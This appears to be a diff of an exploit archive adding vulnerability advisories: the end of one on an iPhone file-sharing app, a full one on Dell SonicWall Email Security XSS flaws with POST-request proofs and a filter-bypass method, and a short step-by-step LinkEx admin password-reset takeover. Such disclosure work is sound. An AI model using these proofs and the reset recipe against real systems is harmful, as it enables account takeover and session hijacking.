<th class="size">Size</th><th/></thead><tbody><tr><td class="icon"><a href=".."><img src="/static/backToParent_icon.png"/></a></td>
<td class="name"><a href="..">Parent Directory</a></td><td class="modifieddate"/><td class="size"/><td/></tr><tr><td class="icon">
<a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">
<img src="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?thumbnail=1"/></a></td>
<td class="name"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td>
<td class="modifieddate">2014-03-19 14:09</td><td class="size">538 bytes</td>
<td class="download"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?download=1">
download</a></td></tr></tbody></table>
--- PoC Sesion Logs [POST] ---
Status: 200[OK]
POST http://localhost:8080/iPhone/Downloads?upload=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[text/plain]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/iPhone/Downloads]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------57142047116429
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
1.2
The command inject web vulnerability can be exploited by local attackers with low user interaction and low privileged web-application user account.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Foldername > Name > [Index File Dir List]
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"></th><th class="name">Name</th>
<th class="modifieddate">Date Modified</th><th class="size">Size</th><th/></thead><tbody><tr><td class="icon">
<a><img src="/static/GenericFolderIcon.png"/></a></td><td class="name"><a href="/iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]>
[LOCAL COMMAND INJECTION VULNERABILITY!]">iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]</a></td><td class="modifieddate">2014-03-19 14:11</td>
<td class="size">--
</td><td class="download"/></tr></tbody></table>
1.3
The denial of service web vulnerability can be exploited by remote attackers with low user interaction (allow|accept).
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC:
http://localhost:8080/iPhone/Downloads/[FileName].*?download=[REMOTE DENIAL OF SERVICE VULNERABILITY!]
Note: After the accept of the device owner the application permanent crashes.
A encode problem returns with an error which results in a crash via memory corruption.
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure parse of the filename value in the upload file module POST method request.
Encode also the output file dir index list with the vulnerable filename output value to prevent injection of malicious context.
1.2
The first vulnerability can be patched by a secure parse of the folder name value in the app sync module POST method request.
Encode also the output file dir index list with the vulnerable folder name output value to prevent injection of malicious context.
1.3
Restrict the download value to integer and allocate the memory. Implement an own little exception-handling to prevent remote denial of service attacks.
Security Risk:
==============
1.1
The security risk of the local file include vulnerability is estimated as critical.
1.2
The security risk of the local command inject vulnerability via phone foldername sync is estimated as high.
1.3
The security risk of the remote denial of service vulnerability is estimated as low(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

318
platforms/multiple/webapps/32556.txt Executable file
View file

@ -0,0 +1,318 @@
Document Title:
===============
Dell SonicWall EMail Security Appliance Application v7.4.5 - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1191
Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
Release Date:
=============
2014-03-26
Vulnerability Laboratory ID (VL-ID):
====================================
1191
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
While most businesses now have some type of anti-spam protection, many must deal with cumbersome
management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership.
SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL
Email Security solutions employ a variety of proven and patented technology designed to block spam and
other threats effectively, easily and economically. With innovative protection techniques for both
inbound and outbound email plus unique management tools, the Email Security platform delivers superior
email protection today—while standing ready to stop the new attacks of tomorrow.
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software
application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a
VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a
traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization,
ease migration and reduce capital costs.
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
Vulnerability Disclosure Timeline:
==================================
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-02-08: Vendor Notification (Dell Security Team)
2014-02-14: Vendor Response/Feedback (Dell Security Team)
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
2014-03-26: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DELL SonicWall
Product: EMail Security Appliance Application 7.4.5.1393
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
The vulnerability allows remote attackers or low privileged user accounts to inject own malicious script codes via POST method request to compromise the
application or user session data/information.
The first vulnerability is located in the `filename` value of the `settings_advanced.html` file. Remote attackers and low privileged application user accounts
are able to inject own malicious script codes to the application-side of the `Advanced Settings - Patch hochladen > Patch-Datei` module. Attackers can manipulate
the file upload POST method request by tampering the session. Next to tampering the session the attacker exchange the file name with a malicious script code
as payload. In the next step the website reloads the next firmware upgrade page (wait.html) with the file details. The execute of the injected script code
via POST method request occurs at the location of the listed file name value. The security risk of the persistent validation web vulnerability is estimated
as medium with a cvss (common vulnerability scoring system) count of 3.5(-).
The second vulnerability is located in the file name value of the settings_upload_dlicense.html file. Remote attackers and low privileged application user accounts
are able to inject own malicious script codes to the application-side of the Lizenz Verwaltung - Lizenzen Upload module. The request method is POST and the attack
vector is persistent. The execute occurs in the exception context of the license update page module. The security risk of the persistent validation web
vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0(+).
Exploitation of both vulnerabilities requires to bypass the regular validation of the web application appliance. To bypass the filter remote attackers can inject two
payloads with a split in the middle. The validation encodes the first injected payload and the second after the split executes the code.
Exploitation of the remote web vulnerabilities requires a privileged user account without user interaction or a remote user with medium to high user interaction.
Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects, persistent phishing and persistent
manipulation of vulnerable connected or affected modules.
Request Method:
[+] POST
Vulnerable Module:
[+] Advanced Settings - Patch hochladen > Patch-Datei (settings_advanced.html)
[+] Lizenz Verwaltung - Lizenzen Upload > (settings_upload_dlicense.html)
Vulnerable Parameter(s):
[+] file name
Affected Module(s):
[+] Firmware Update - Waiting Page (wait.html)
[+] License Update Page (exception)
Affected Version(s):
[+] 7.4.6
Affected Appliance Model(s):
[+] Dell SonicWall EMail Security Appliance Web Application - All Models
Proof of Concept (PoC):
=======================
The two persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged email security application user account and
low user interaction or without privileged web-application user account on client-side via POST inject. For security demonstration or to reproduce the
vulnerability follow the provided information and steps below.
URL: Input
http://ess.localhost:8619/settings_advanced.html
URL: Execute
http://ess.localhost:8619/wait.html
PoC: Firmware Update - Status Waiting Site
<div style="border-radius: 10px;" class="warning_bubble_content">
<div class="bubble_title">Die Firmware wird aktualisiert...</div>
<div class="bubble_text">
<div id="updaterMessage">
Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu!
<div class="alert">Email Security ist immer noch mit der Verarbeitung von E-Mails beschäftigt.</div>
</div>
<div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div>
<div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
<br>
<div><div class="dotdot lefthand"></div></div>
<div>Abgelaufene Zeit: <span id="updateMS">00:00:36</span></div>
<div id="installProgressText" class="tail_trail"></div>
</div>
</div>
--- PoC Session Logs [POST] ---
Status: 302[Moved Temporarily]
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_advanced.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D; JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------213272019431414
Content-Disposition: form-data; name="sortFiles"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="smtpBanner"
><><iframe src=http://www.vulnerability-lab.com/> ;)
-----------------------------213272019431414
Content-Disposition: form-data; name="receivedBy"
-----------------------------213272019431414
Content-Disposition: form-data; name="dnsTimeout"
2
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryAgeDays"
10
-----------------------------213272019431414
Content-Disposition: form-data; name="whiteListSelf"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryInbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="fullHistoryOutbound"
false
-----------------------------213272019431414
Content-Disposition: form-data; name="logLevel"
fatal
-----------------------------213272019431414
Content-Disposition: form-data; name="dbAging"
366
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpOn"
true
-----------------------------213272019431414
Content-Disposition: form-data; name="snmpComStr"
snwl>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg
-----------------------------213272019431414
Content-Disposition: form-data; name="uploadPatch"; filename=>>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
1.2
URL: Input
http://ess.localhost:8619/settings_dlicense.html
URL: Execute
http://ess.localhost:8619/settings_upload_dlicense.html
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://ess.localhost:8619/settings_upload_dlicense.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[esserver.demo.sonicwall.com]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://esserver.demo.sonicwall.com/settings_upload_dlicense.html]
Cookie[s_cc=true; s_sq=%5B%5BB%5D%5D;
JSESSIONID=48D1C2695CBD91CAAA187C5A9DFFD5DC; __utma=227649090.1810522928.
1391719457.1391719457.1391719457.1; __utmb=227649090.2.10.1391719457; __utmc=227649090; __utmz=227649090.1391719457.1.
1.utmcsr=esserver.demo.sonicwall.com|utmccn=(referral)|utmcmd=referral|utmcct=/settings_branding.html; __utmv=227649090.|
1=User%3AUnkown=Unknown=1; s_vi=[CS]v1|2979FA11051D0AC5-40000137600ADB77[CE]]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------281841889227097
Content-Disposition: form-data; name="uploadLicenses"; filename=">>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg"
Content-Type: image/jpeg
Solution - Fix & Patch:
=======================
Both vulnerabilities can be patched by a secure parse and encode of the file name value in the 2 affected upload POST method requests.
Filter and encode also in the wait.html and license exception the vulnerable output values even if the input is still parsed.
SonicWall Solution:
============
We recommend existing users of Dell SonicWALL Email Security upgrade to version 7.4.6 to prevent this cross-site script injection from being executed by unauthorized users.
Email Security 7.4.6 is available for download from www.mysonicwall.com. Users should log into mySonicWALL and click on Downloads > Download Center in the navigation panel
in the left-hand navigation, then select “Email Security” in the Software Type drop down menu.
Security Risk:
==============
The security risk of the persistent and non persistent post inject web vulnerabilities are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

28
platforms/php/webapps/32561.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork: linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions
LinkEx Is A Open Source Web Application For Exchanging link , Which Most
Of The Porn Sites Uses it ,
1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password
Shouts to :- | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |
--
Regards
N B Sri Harsha